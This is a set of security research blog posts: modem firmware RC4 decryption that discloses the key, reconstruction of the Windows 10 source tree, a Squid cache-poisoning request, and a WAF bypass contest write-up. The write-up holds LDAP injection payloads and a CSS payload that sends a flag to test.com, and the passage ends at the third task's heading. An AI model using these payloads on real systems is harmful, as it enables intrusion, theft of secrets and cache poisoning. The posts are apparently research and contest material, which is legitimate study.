Channel: Positive Technologies - learn and secure

Decipher Updates of a Popular 4G Modem: Dmitry Sklyarov’s Method


What can a reverse engineer do when, trying to examine a device's code, he finds nothing but encrypted firmware files? Here is a real story of how to meet that challenge with basic computer-science knowledge and plain logic.

We deliberately do not specify the modem vendor or the exact file names — this article focuses on the challenge and an interesting approach to solving it. The method is not applicable to the latest models of this modem, but it may work with older ones and with other vendors' devices.

1. Identifying the structure

At first, we identify the structure of the firmware files. There are three update versions for the same modem:

  • v2.8_image.bin
  • v3.7_image.bin
  • v3.7.4_image.bin

All the files share the TLV (Tag-Length-Value) format. For v3.7.4_image.bin, for instance, it looks as follows:


All the values are little-endian; Tag is 16 bits long, Length is 32 bits.

Tag 0x7240 is located at the first nesting level, and its data occupies the whole file. At the second level (inside the data of tag 0x7240) come tag 0x0003 (0x0A bytes), then tag 0x0000 (0x4BDE0E bytes), followed by 0x0001 and 0x0002 (they did not fit into the screenshot). The third level (within the data of tag 0x0003) contains tag 0x0002, which stores the four-byte version number 030704FF (3.7.4, if the trailing FF is skipped).

Other tags located at the second nesting level (0x0000, 0x0001, and 0x0002) store descriptions of separate files “packaged” in a single firmware file.

Each file has a name (tag 0x0001), flags (tag 0x0002), size (tag 0x0003), 16-byte value (tag 0x0004), and file data (tag 0x0005).
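As a rough sketch (in Python; the helper name and the recursion idiom are ours, not from the original tooling), the format can be parsed like this:

```python
import struct

def parse_tlv(data, offset=0, end=None):
    """Parse a flat sequence of TLV records: a 16-bit tag, a 32-bit
    length, then `length` value bytes; all fields little-endian."""
    end = len(data) if end is None else end
    records = []
    while offset + 6 <= end:
        tag, length = struct.unpack_from('<HI', data, offset)
        records.append((tag, data[offset + 6:offset + 6 + length]))
        offset += 6 + length
    return records

# Nested levels are handled by recursing into a record's value, e.g.:
# top = parse_tlv(open('v3.7.4_image.bin', 'rb').read())
# second_level = parse_tlv(top[0][1])   # records inside tag 0x7240
```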

The following structure comes as a result of parsing the whole scope of the tags:


So it is possible to retrieve encrypted data for all the components (CPUImage, AutoInstall, and WebUI) from the firmware files. AutoInstall turned out to be the same for all three firmware versions, WebUI contents were the same for v3.7 and v3.7.4, and CPUImage was unique in every version.

2. Guesswork by algorithms

Tag 0x0004 at the third nesting level contains a 16-byte data set with high entropy. It might be a hash value, and the most popular 128-bit hash is MD5.

In the retrieved files, many bytes have the same values at the same offset. Below is the beginning of two files (differences are highlighted):


However, if you search for identical sequences within a single file, there are no long repeats. This looks like the result of applying a constant, semi-random gamma (keystream) as long as the message. RC4 is the most popular cryptographic algorithm that works this way.

3. Attacking a stream cipher with a constant key

If several messages are encrypted with the same key (i.e. gamma), XORing them may reveal their fragments: zero bytes will return plaintext.
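The principle fits in a few lines of Python (a toy illustration, not the original tooling):

```python
def xor_bytes(a, b):
    """XOR two byte strings of equal length."""
    return bytes(x ^ y for x, y in zip(a, b))

# Two "ciphertexts" produced with the same keystream:
gamma = bytes(range(16))
c1 = xor_bytes(b'SECRET MESSAGE!!', gamma)
c2 = xor_bytes(b'\x00' * 16, gamma)   # plaintext full of zero bytes

# c1 XOR c2 == p1 XOR p2; where p2 is zero, p1 shows through:
assert xor_bytes(c1, c2) == b'SECRET MESSAGE!!'
```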

The files AutoInstall and WebUI give interesting results:

00000000: EB 3C 90 6D 6B 64 6F 73 66 73 00 00 02 04 01 00  л<ђmkdosfs  ☻♦☺
00000010: 02 00 02 F8 0F F8 03 00 20 00 40 00 00 00 00 00  ☻ ☻ш☼ш♥   @
00000020: 00 00 00 00 00 00 29 6E 1F 3B 15 47 43 54 2D 4C        )n▼;§GCT-L
00000030: 54 45 20 20 20 20 46 41 54 31 32 20 20 20 0E 1F  TE    FAT12   ♫▼
00000040: BE 5B 7C AC 22 C0 74 0B 56 B4 0E BB 07 00 CD 10  ѕ[|¬"Аt♂Vґ♫»• Н►
00000050: 5E EB F0 32 E4 CD 16 CD 19 EB FE 54 68 69 73 20  ^лр2дН▬Н↓люThis
00000060: 69 73 20 6E 6F 74 20 61 20 62 6F 6F 74 61 62 6C  is not a bootabl
00000070: 65 20 64 69 73 6B 2E 20 20 50 6C 65 61 73 65 20  e disk.  Please
00000080: 69 6E 73 65 72 74 20 61 20 62 6F 6F 74 61 62 6C  insert a bootabl
00000090: 65 20 66 6C 6F 70 70 79 20 61 6E 64 0D 0A 70 72  e floppy and♪◙pr
000000A0: 65 73 73 20 61 6E 79 20 6B 65 79 20 74 6F 20 74  ess any key to t
000000B0: 72 79 20 61 67 61 69 6E 20 2E 2E 2E 20 0D 0A 00  ry again ... ♪◙
000000C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
00008800: 02 43 44 30 30 31 01 00 00 20 00 20 00 20 00 20  ☻CD001☺
00008810: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20

These two fragments suggest that one file is the image of a FAT12 floppy disk and the other is a CD-ROM image.

4. Retrieving first gamma bits

For installation of drivers or supplemental software, modern cellular modems tend to create a virtual CD-ROM upon connection. The same concept is used in this case.

However, when the modem connects to an up-to-date operating system (Windows 7/8, Linux, Mac OS X), the CD-ROM either does not appear at all or shows up for a second and then disappears. On a Windows XP laptop manufactured in 2002 and found specifically for this test, the CD-ROM shows up for a whole five seconds, which is quite enough to read all logical volume sectors and obtain an image. Its size, 606,208 = 0x94000 bytes, corresponds to the size of the AutoInstall file, and its MD5 value, 897279F34B7629801D839A3E18DA0345, equals the value of tag 0x0004.

Now we only need to XOR the AutoInstall file with the known CD-ROM image to obtain the gamma's first 600 kB. This gamma can be used to decrypt the beginnings of CPUImage and WebUI (which are 4,971,976 and 2,093,056 bytes long, respectively).
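In code, recovering the gamma and applying it to another file's prefix looks like this (a sketch; the variable names in the comments are placeholders for the article's files):

```python
def recover_gamma(ciphertext, known_plaintext):
    """Stream-cipher property: keystream = ciphertext XOR known plaintext."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

def decrypt_prefix(ciphertext, gamma):
    """Decrypts only as many bytes as the recovered keystream covers."""
    return bytes(c ^ g for c, g in zip(ciphertext, gamma))

# gamma = recover_gamma(autoinstall_encrypted, cdrom_image)  # 606,208 bytes
# webui_head = decrypt_prefix(webui_encrypted, gamma)
```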

5. Restructuring an FDD image

If you decipher the beginning (first 606,208 bytes) and zero-fill the rest of the WebUI file, and then interpret everything as an FAT image, you will see the file system structure and the contents of some files:

          Name           | Size |  Date  |Time
bru                      |Folder|31.05.12|22:17
cgi-bin                  |Folder|31.05.12|22:17
cors                     |Folder|31.05.12|22:17
css                      |Folder|31.05.12|22:17
eng                      |Folder|31.05.12|22:17
img                      |Folder|31.05.12|22:17
js                       |Folder|31.05.12|22:17
ru                       |Folder|31.05.12|22:17
name.html                |  2248|31.05.12|22:17
easyXDM.js               |101924|31.05.12|22:17
easyXDM.debug.js         |113900|31.05.12|22:17
easyXDM.min.js           | 19863|31.05.12|22:17
easyXDM.Widgets.js       | 11134|31.05.12|22:17
easyXDM.Widgets.debug.js | 11134|31.05.12|22:17
easyXDM.Widgets.min.js   |  3114|31.05.12|22:17
json2.js                 | 17382|31.05.12|22:17
easyxdm.swf              |  1758|31.05.12|22:17
MIT-license.txt          |  1102|31.05.12|22:17

If your modem is connected and you browse to the address http:///dir, you will see the same file system and will be able to download any file.

To restore the WebUI image, you need to place the files downloaded via the web interface in accordance with the boot sector, FAT table, and directory data. The only difficulty is the ru sub-folder in the root directory: the cluster holding its directory entries lies beyond the first 606,208 bytes, so its contents have to be restored separately.

According to the web interface data, the ru directory must include the following files:

          Name           | Size |  Date  |Time
Manualupdate.html        |  3981|31.05.12|22:17
Index.html               |  5327|31.05.12|22:17
Network.html             |  3328|31.05.12|22:17

Fortunately, there is the eng folder in the root directory that contains files with the same names and creation dates. To obtain correct data for the ru folder, the following should be changed:

  • The number of the starting cluster of the current directory
  • The size of each file
  • The numbers of the starting clusters of all files

The root directory gives the cluster number of the ru directory (0x213).
The web interface reveals the file sizes (3981 = 0xF8D, 5327 = 0x14CF, and 3328 = 0xD00 respectively).

The numbers of the starting clusters must be guessed, but that is easy. According to the boot data, each cluster occupies four sectors or 2,048 bytes. The ru directory requires one cluster only, the files Manualupdate.html and Network.html — two clusters, Index.html — three clusters. Since clusters are written on an empty disk sequentially, files will start in clusters 0x214, 0x216, and 0x219 respectively. Restored data for the ru directory are as follows:

00000000: 2E 20 20 20 20 20 20 20 20 20 20 10 00 00 2C AA  .          ►  ,к
00000010: BF 40 BF 40 00 00 2C AA BF 40 13 02 00 00 00 00  ┐@┐@  ,к┐@‼☻
00000020: 2E 2E 20 20 20 20 20 20 20 20 20 10 00 00 2C AA  ..         ►  ,к
00000030: BF 40 BF 40 00 00 2C AA BF 40 00 00 00 00 00 00  ┐@┐@  ,к┐@
00000040: 42 68 00 74 00 6D 00 6C 00 00 00 0F 00 56 FF FF  Bh t m l   ☼ V  
00000050: FF FF FF FF FF FF FF FF FF FF 00 00 FF FF FF FF                  
00000060: 01 6D 00 61 00 6E 00 75 00 61 00 0F 00 56 6C 00  ☺m a n u a ☼ Vl
00000070: 75 00 70 00 64 00 61 00 74 00 00 00 65 00 2E 00  u p d a t   e .
00000080: 4D 41 4E 55 41 4C 7E 31 48 54 4D 20 00 00 2C AA  MANUAL~1HTM   ,к
00000090: BF 40 BF 40 00 00 2C AA BF 40 14 02 8D 0F 00 00  ┐@┐@  ,к┐@¶☻Н☼
000000A0: 41 69 00 6E 00 64 00 65 00 78 00 0F 00 33 2E 00  Ai n d e x ☼ 3.
000000B0: 68 00 74 00 6D 00 6C 00 00 00 00 00 FF FF FF FF  h t m l         
000000C0: 49 4E 44 45 58 7E 31 20 48 54 4D 20 00 00 2C AA  INDEX~1 HTM   ,к
000000D0: BF 40 BF 40 00 00 2C AA BF 40 16 02 CF 14 00 00  ┐@┐@  ,к┐@▬☻╧¶
000000E0: 41 6E 00 65 00 74 00 77 00 6F 00 0F 00 98 72 00  An e t w o ☼ Шr
000000F0: 6B 00 2E 00 68 00 74 00 6D 00 00 00 6C 00 00 00  k . h t m   l
00000100: 4E 45 54 57 4F 52 7E 31 48 54 4D 20 00 00 2C AA  NETWOR~1HTM   ,к
00000110: BF 40 BF 40 00 00 2C AA BF 40 19 02 00 0D 00 00  ┐@┐@  ,к┐@↓☻ ♪
00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
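The cluster arithmetic behind this reconstruction can be checked with a few lines of Python (the function name is ours):

```python
def starting_clusters(first_cluster, file_sizes, cluster_size=2048):
    """Files written sequentially onto an empty disk: each file begins
    in the cluster right after the last cluster of the previous file."""
    starts, cluster = [], first_cluster
    for size in file_sizes:
        starts.append(cluster)
        cluster += -(-size // cluster_size)   # ceiling division
    return starts

# The ru directory itself occupies cluster 0x213, so its files start at 0x214:
# starting_clusters(0x214, [0xF8D, 0x14CF, 0xD00]) -> [0x214, 0x216, 0x219]
```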

Having assembled a disk image with the ru folder and all file contents (the first cluster corresponds to sector 0x23), we obtain a plaintext version of the WebUI file, whose MD5 matches 48D1C3194E45472D28ABFBEB6BBF1CC6 from the firmware file header.

Therefore, we have the AutoInstall and WebUI files deciphered and we know gamma’s first 2,093,056 bytes.

6. Checking CPUImage

With the first 2 MB of CPUImage decrypted, it is reasonable to start a disassembler. After identifying the processor's instruction set (little-endian ARM), the image base address (the first 0x34C bytes must be skipped), and the location of the update-decryption routine, the following code emerges:

ROM:0008ADD0 loc_8ADD0 
ROM:0008ADD0                 LDR             R1, =byte_2ADC60
ROM:0008ADD4                 LDRB            R2, [R1,R0]
ROM:0008ADD8                 LDRB            R1, [R4]
ROM:0008ADDC                 ADD             R0, R0, #1
ROM:0008ADE0                 ADD             R2, R2, R1
ROM:0008ADE4                 ADD             R2, R2, R6
ROM:0008ADE8                 AND             R6, R2, #0xFF
ROM:0008ADEC                 LDRB            R2, [R10,R6]
ROM:0008ADF0                 STRB            R2, [R4],#1
ROM:0008ADF4                 STRB            R1, [R10,R6]
ROM:0008ADF8                 MOV             R1, #0x15
ROM:0008ADFC                 BL              sub_27C0EC
ROM:0008AE00                 SUBS            R11, R11, #1
ROM:0008AE04                 AND             R0, R1, #0xFF
ROM:0008AE08                 BNE             loc_8ADD0

This code loads the encryption key, located at 0x2ADC60 and 0x15 bytes long, into the RC4 algorithm. But 0x2ADC60 = 2,808,928, so the key lies beyond the gamma we know.

In earlier firmware versions (3.7 and 2.8), the key is also outside the decrypted area (0x2AD70C and 0x2A852C respectively).

7. XORing again

XORing CPUImage v3.7 with CPUImage v3.7.4 reveals the string “SungKook "James" Shin” at the address 0x34C + 0x2AD70C = 0x2ADA58. This is the RC4 key used to encrypt all the update files.

Now we only need to verify that the RC4 gamma matches the gamma obtained earlier and that the CPUImage MD5 matches the value in the firmware file header.
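A textbook RC4 implementation is enough for this check (a sketch in Python): generate the keystream from the recovered key and compare it byte-for-byte with the gamma obtained from the CD-ROM image.

```python
def rc4_keystream(key, n):
    """Standard RC4: key-scheduling algorithm, then n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

# rc4_keystream(b'SungKook "James" Shin', 606208) should match the gamma
# recovered from the AutoInstall file (note: the key is exactly 0x15 bytes).
```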

Now we can examine the firmware itself, but this is quite a different story.

Author: Dmitry Sklyarov, Positive Research

From Telemetry to Open Source: an Overview of Windows 10 Source Tree


There is a lot of internal information available about Microsoft software, despite the fact that it is closed-source. For example, libraries export functions by name, which reveals something about the interfaces used. Debugging symbols used for troubleshooting operating system errors are publicly available as well; however, only compiled binary modules are at hand. In this article, we will try to determine what they looked like prior to compilation, using only legal methods.

The question itself is not new: Mark Russinovich and Alex Ionescu have explored it before; however, my research was more detailed. What we need is the publicly available debugging symbol packages, in this case for the most recent release of Windows 10 (64-bit), both free and checked builds.

Debugging symbols are a set of .pdb (program database) files that keep various information used for debugging purposes of Windows binary modules including names for globals, functions, and data structures, sometimes even with field names.

We can also use information from an almost-publicly-available checked build of Windows 10. This kind of build is full of debugging assertions that contain sensitive information about local variable names and even source line numbers.



The example above, while not providing an absolute path, does expose extremely helpful path information. 

If we feed the debugging symbols to the Sysinternals "strings" utility, we get around 13 GB of raw data. Repeating this for all Windows installation files would mostly generate useless data, so we limit the target file types to the following list: exe — executable files, sys — drivers, dll — libraries, ocx — ActiveX components, cpl — control panel elements, efi — EFI applications, in particular the bootloader. This yields an additional 5.3 GB of raw data. I was initially surprised that so few programs can open multi-gigabyte files, and even fewer can search for specific data inside them. I used 010 Editor for manual operations on the raw and temporary data, and Python scripts for automated data filtering.

Filtering Symbol Data

The symbol file contains a list of object files used for linking of a corresponding executable image. Object file paths are absolute.


  • Filtering clue No. 1: find strings using the mask ":\\".

We are able to get the absolute paths, sort them and remove duplicates, and due to the low volume of junk data, it can be removed manually. These results indicate the source tree structure. The root directory is "d:\th", which may stand for threshold, part of the name of the November release of Windows 10 — Threshold 1. However, we only get a few filenames starting with "d:\th". This is because the linker uses already compiled files as an input. Source files are compiled into the folders "d:\th.obj.amd64fre" for the release or free version of Windows and "d:\th.obj.amd64chk" for the checked or debug version.
  • Filtering clue No. 2: assuming that source files are stored as the corresponding object files after compilation, we can “decompile” object files back to the source ones. Please note that this step can produce an inaccurate structure in the source tree because we don't know for certain the compilation options used.
For example: 

d:\th.obj.amd64fre\shell\osshell\games\freecell\objfre\amd64\freecellgame.obj

turns into

d:\th\shell\osshell\games\freecell\freecellgame.c??

As for the file extensions, an object file can be produced from a range of different file types like "c", "cpp", "cxx", etc. and there is no way to identify the type of a source file, so we leave the "c??" extension.
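A rough conversion (a Python sketch; the regular expressions only cover the directory patterns shown above) might look like:

```python
import re

def obj_to_source(path):
    """Map a compiled object-file path back to a guessed source path.
    The extension of the original source is unknown, hence 'c??'."""
    path = path.lower()
    # d:\th.obj.amd64fre\... or d:\th.obj.amd64chk\...  ->  d:\th\...
    path = re.sub(r'^d:\\th\.obj\.amd64(fre|chk)', r'd:\\th', path)
    # drop the intermediate \objfre\amd64\ (or \objchk\amd64\) component
    path = re.sub(r'\\obj(fre|chk)\\amd64\\', r'\\', path)
    return re.sub(r'\.obj$', '.c??', path)
```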

There are a lot of different root directories, not only "d:\th". Others include "d:\th.public.chk" and "d:\th.public.fre", however, we shall omit these because they are just placeholders for publicly available SDKs. We also note there are many driver projects, which are seemingly built at developers' workplaces:

c:\users\joseph-liu\desktop\sources\rtl819xp_src\common\objfre_win7_amd64\amd64\eeprom.obj
C:\ALLPROJECTS\SW_MODEM\pcm\amd64\pcm.lib
C:\Palau\palau_10.4.292.0\sw\host\drivers\becndis\inbox\WS10\sandbox\Debug\x64\eth_tx.obj
C:\Users\avarde\Desktop\inbox\working\Contents\Sources\wl\sys\amd64\bcmwl63a\bcmwl63a\x64\Windows8Debug\nicpci.obj

There is a standard set of drivers for devices compatible with public specifications, such as USB XHCI controllers, which is part of the Windows source tree, while all vendor-specific drivers are built elsewhere.
  • Filtering clue No. 3: remove binary files, because we are only interested in source ones. Remove "pdb", "exp", "lib"; "res" files can be reverted to the original "rc" (resource compiler) files.

While this output is neat, we cannot get any additional information about source files from this step, so we must work with the next data set. 

Filtering Raw Binaries Data

As there are only a few absolute filenames in this data set, we will use the following extensions as a filter:
  • "c" — C sources
  • "cpp" — C++ sources
  • "cxx" — C or C++ sources
  • "h" — C header
  • "hpp" — C++ header
  • "hxx" — C or C++ header
  • "asm" — assembly source (MASM)
  • "inc" — assembly header (MASM)
  • "def" — module definition file
After the data is filtered, we can see that even though the filenames are not absolute, they are relative to the "d:\th" root, so we just add the "d:\th" string to all of the resulting filenames.

At this stage, there are problems with the filtered data. The first problem: we are not sure that object file paths were properly reverted to the source files paths.
  • Filtering clue No. 4: let's check if there are matching filepaths between filtered symbol data and filtered data from binaries.
They do match, which means we properly restored most of the source tree's directory structure. Some folders might not be restored correctly, but this level of inaccuracy is acceptable. We can also replace the "c??" extensions with the extensions of the matching filepaths.

The second problem is header files. Although a header file is a very important part of a source tree, it is not compiled into an object file. This means that we can't restore the information about header files from object files, so we can only locate and restore header files that were found in the raw data from binaries.

The third problem is that we still don't know the extensions of most source files.
  • Filtering clue No. 5: assume that a directory contains source files of the same type.
This means that if a directory already contains the "cpp" source file, it is likely that all the other files in the same folder will be "cpp" sources.
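This heuristic is easy to script (a sketch; we split on backslashes directly, since these are Windows paths processed on any host):

```python
from collections import Counter

def infer_extensions(paths):
    """Per directory, count the known source extensions, then replace the
    'c??' placeholder with the most common extension in that directory."""
    by_dir = {}
    for p in paths:
        d, _, name = p.rpartition('\\')
        ext = name.rsplit('.', 1)[-1]
        if ext != 'c??':
            by_dir.setdefault(d, Counter())[ext] += 1
    out = []
    for p in paths:
        d, _, name = p.rpartition('\\')
        if name.endswith('.c??') and d in by_dir:
            p = p[:-3] + by_dir[d].most_common(1)[0][0]
        out.append(p)
    return out
```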


  • Filtering clue No. 6: use external sources of information for detail specification.
I used Windows Research Kernel as a reference to the assembler sources and renamed some assembly sources by hand.

Inspecting the Result Data

A keyword search in the source filenames for "telemetry" resulted in 424 hits, the most interesting of which are listed below.

d:\th\admin\enterprisemgmt\enterprisecsps\v2\certificatecore\certificatestoretelemetry.cpp
d:\th\base\appcompat\appraiser\heads\telemetry\telemetryappraiser.cpp
d:\th\base\appmodel\search\common\telemetry\telemetry.cpp
d:\th\base\diagnosis\feedback\siuf\libs\telemetry\siufdatacustom.c??
d:\th\base\diagnosis\pdui\de\wizard\wizardtelemetryprovider.c??
d:\th\base\enterpriseclientsync\settingsync\azure\lib\azuresettingsyncprovidertelemetry.cpp
d:\th\base\fs\exfat\telemetry.c
d:\th\base\fs\fastfat\telemetry.c
d:\th\base\fs\udfs\telemetry.c
d:\th\base\power\energy\platformtelemetry.c??
d:\th\base\power\energy\sleepstudytelemetry.c??
d:\th\base\stor\vds\diskpart\diskparttelemetry.c??
d:\th\base\stor\vds\diskraid\diskraidtelemetry.cpp
d:\th\base\win32\winnls\els\advancedservices\spelling\platformspecific\current\spellingtelemetry.c??
d:\th\drivers\input\hid\hidcore\hidclass\telemetry.h
d:\th\drivers\mobilepc\location\product\core\crowdsource\locationoriontelemetry.cpp
d:\th\drivers\mobilepc\sensors\common\helpers\sensorstelemetry.cpp
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\bthtelemetry.c??
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\fingerprintcollector.c??
d:\th\drivers\wdm\bluetooth\user\bthtelemetry\localradiocollector.c??
d:\th\drivers\wdm\usb\telemetry\registry.c??
d:\th\drivers\wdm\usb\telemetry\telemetry.c??
d:\th\ds\dns\server\server\dnsexe\dnstelemetry.c??
d:\th\ds\ext\live\identity\lib\tracing\lite\microsoftaccounttelemetry.c??
d:\th\ds\security\base\lsa\server\cfiles\telemetry.c
d:\th\ds\security\protocols\msv_sspi\dll\ntlmtelemetry.c??
d:\th\ds\security\protocols\ssl\telemetry\telemetry.c??
d:\th\ds\security\protocols\sspcommon\ssptelemetry.c??
d:\th\enduser\windowsupdate\client\installagent\common\commontelemetry.cpp
d:\th\enduser\winstore\licensemanager\lib\telemetry.cpp
d:\th\minio\ndis\sys\mp\ndistelemetry.c??
d:\th\minio\security\base\lsa\security\driver\telemetry.cxx
d:\th\minkernel\fs\cdfs\telemetry.c
d:\th\minkernel\fs\ntfs\mp\telemetry.c??
d:\th\minkernel\fs\refs\mp\telemetry.c??
d:\th\net\netio\iphlpsvc\service\teredo_telemetry.c
d:\th\net\peernetng\torino\telemetry\notelemetry\peerdistnotelemetry.c??
d:\th\net\rras\ip\nathlp\dhcp\telemetryutils.c??
d:\th\net\winrt\networking\src\sockets\socketstelemetry.h
d:\th\shell\cortana\cortanaui\src\telemetrymanager.cpp
d:\th\shell\explorer\traynotificationareatelemetry.h
d:\th\shell\explorerframe\dll\ribbontelemetry.c??
d:\th\shell\fileexplorer\product\fileexplorertelemetry.c??
d:\th\shell\osshell\control\scrnsave\default\screensavertelemetryc.c??
d:\th\windows\moderncore\inputv2\inputprocessors\devices\keyboard\lib\keyboardprocessortelemetry.c??
d:\th\windows\published\main\touchtelemetry.h
d:\th\xbox\onecore\connectedstorage\service\lib\connectedstoragetelemetryevents.cpp
d:\th\xbox\shellui\common\xbox.shell.data\telemetryutil.c??

These results don’t generate additional information about the telemetry internals, but they do provide an interesting starting point for a more detailed research. 

Next I looked for PatchGuard; the source tree contains only one related file, of an unknown type (most likely binary).

d:\th\minkernel\ntos\ke\patchgd.wmp

Searching the unfiltered data reveals that PatchGuard is in fact a separate project.

d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen00.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen01.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen02.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen03.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen04.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen05.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen06.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen07.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen08.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp\xcptgen09.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgd.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda2.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda3.c??
d:\bnb_kpg\minkernel\oem\src\kernel\patchgd\mp_noltcg\patchgda4.c??

I also searched for random phrases and words. Some interesting results are provided below:

d:\th\windows\core\ntgdi\fondrv\otfd\atmdrvr\umlib\backdoor.c??
d:\th\inetcore\edgehtml\src\site\webaudio\opensource\wtf\wtfvector.h
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libjpeg\jaricom.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libpng\png.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\libtiff\tif_compress.c??
d:\th\printscan\print\drivers\renderfilters\msxpsfilters\util\opensource\zlib\deflate.c??

You are invited to check Windows 10 source tree at Github and share your findings.

Author: Artem Shishkin, Positive Research

“Squoison” Attack: High-severity Vulnerability in Squid Proxy Server Allows Cache Poisoning



Jianjun Chen, a postgraduate student at Tsinghua University, discovered a critical vulnerability in the popular Squid proxy server. He found that Squid fails to conform to the RFC 7230 standard and does not parse and validate the Host header in HTTP requests properly. This allows attackers to conduct a cache poisoning attack using a specially crafted packet.

What is the problem?

The researcher managed to execute a cache poisoning attack against arbitrary unencrypted HTTP requests in Squid 3.5.12. For successful exploitation, an attacker must be able to send requests to some website (such as attack.com) through the proxy server. Under this scenario, the attacker first establishes a TCP connection with the attack.com web server. Since Squid works in transparent proxy mode, these requests are intercepted and forwarded. At the next stage, the attacker issues the following HTTP request:

GET http://victim.com/ HTTP/1.1
Host: attack.com 

The cache module uses the host address from the request line (victim.com) to create the cache key, whereas the verification module uses the Host header (attack.com) to check that the host matches the destination IP address. This mismatch is what makes the attack possible.
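For illustration, the crafted request can be assembled like this (a sketch; actually sending it through the proxy is left out):

```python
def build_poisoning_request():
    """The absolute-form request line names victim.com (used by Squid's
    cache module for the cache key), while the Host header names
    attack.com (used by the verification module)."""
    return (b'GET http://victim.com/ HTTP/1.1\r\n'
            b'Host: attack.com\r\n'
            b'Connection: close\r\n'
            b'\r\n')
```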

The researcher has also published a video demonstration of the attack.

Such attacks can be carried out remotely using Flash ads. The consequences of this vulnerability can be severe because many Internet providers use Squid as a transparent proxy.

Early on, the Squid developers believed that the detected vulnerability was the same as CVE-2009-0801, but the researcher proved that the new attack is unrelated to that older issue. In the case of CVE-2009-0801, an attacker could perform an SOP bypass caused by improper processing of the destination IP address; that issue was fixed in Squid 3.3. The newly detected vulnerability in Squid 3.5 is caused by inconsistent operation of the route verification and cache modules.

How to Protect Yourself

The vulnerability has already been fixed, but there is still no CVE identifier or patched release of Squid available. The fix is included only in the daily builds of the 4 and 3.5 branches.

Positive Technologies experts recommend enabling the host_verify_strict option (disabled by default) and using a Suricata IDS rule to detect exploitation attempts.

PHDays VI: WAF Bypass Contest


The WAF Bypass competition, an annual event held during Positive Hack Days, an international forum on information security, took place this May as well. Participants attempted to bypass the security checks of PT Application Firewall, which protected vulnerable applications. Positive Technologies specialists had deliberately introduced configuration errors that made certain bypasses possible.

The goal of each task was to retrieve a flag stored in a database, in the file system, or in cookies given to a special bot. Below are descriptions and solutions of the contest's tasks.


1. m0n0l1th

In this task, participants performed an LDAP injection to retrieve the admin password from LDAP storage. A form accepted a username, which was passed directly into an LDAP query.


Standard vectors such as admin)(|(password=*) were blocked by regular expressions; however, the block could be bypassed by adding whitespace (a %0a line break) between the operands of the query:

admin)(%0a|(password=*)

Then, to obtain the password, a contestant needed to brute-force it character by character:

admin)(%0a|(password=a*)
admin)(%0a|(password=a3*)
admin)(%0a|(password=a3b*)
admin)(%0a|(password=a3b8*)
admin)(%0a|(password=a3b8b*)
admin)(%0a|(password=a3b8ba*)
...
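The loop above is mechanical. A minimal sketch (the `oracle` callable is a stand-in for submitting the injected username through the form and observing whether the LDAP filter matched; all names are ours):

```python
import string

def brute_password(oracle, alphabet=string.ascii_lowercase + string.digits):
    """Extend the known prefix one character at a time; each attempt
    corresponds to the injection admin)(%0a|(password=<prefix>*)."""
    password = ''
    while True:
        for ch in alphabet:
            if oracle(password + ch + '*'):
                password += ch
                break
        else:
            # no character extends the prefix: the full password is known
            return password
```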

2. p0tat0

Upon opening the task, a contestant viewed the following page:


A relevant piece of the HTML code was as follows:


There are several key points in the above HTML. First, DOCTYPE declares transitional HTML syntax, which allows lax CSS parsing. Second, the flag sits between the link and script tags, which are not separated by line breaks.

It may seem that there is no way for an attacker to affect the static page; however, a request such as /index.php/test shows that the path is reflected in both the link and script tags, and instead of a 404 error the same page is returned. This happens due to a feature of the Apache web server (although some other web servers behave the same way).

The first thing to try in such a case is definitely XSS, but quotes and opening tags were escaped. To solve this task, another method had to be applied: Relative Path Overwrite (RPO). RPO exploits lax CSS parsing in browsers, forcing the victim's browser to interpret an injected CSS style inside an HTML document. Those CSS styles can then be used to send the user's data to a remote server. The injection vector was as follows:

/index.php/%250a*%7B%7D%250abody%7Bbackground:red%7D%250a/

Upon sending this request, the browser loads the CSS style via:

/index.php/%0a*{}%0abody{background:red}%0a//../styles.css

The browser detects valid CSS styles in the HTML code it receives in response:



An exploit for this task uses CSS properties to send to a remote server the flag, which sits between two attacker-controlled fragments of text. Example:

/index.php/')%7D%250a%250a*%7B%7D%250abody%7Bbackground:url('http://test.com/

However, the contest prohibited the use of CSS property keywords that trigger a request to another website: import, content, image, background, font.

While the above restrictions impose some limits, there are several other CSS properties that leak requests. If you look at all of the known methods listed in the project HTTP Leaks, and notice that there is an HTML list in the source code, you will easily determine that the following vector is not blocked:

/index.php/')%7D%250a%250a*%7B%7D%250abody%7Blist-style:url('http://test.com/

Such a request forces a bot based on PhantomJS to send a flag:


3. d3rr0r1m

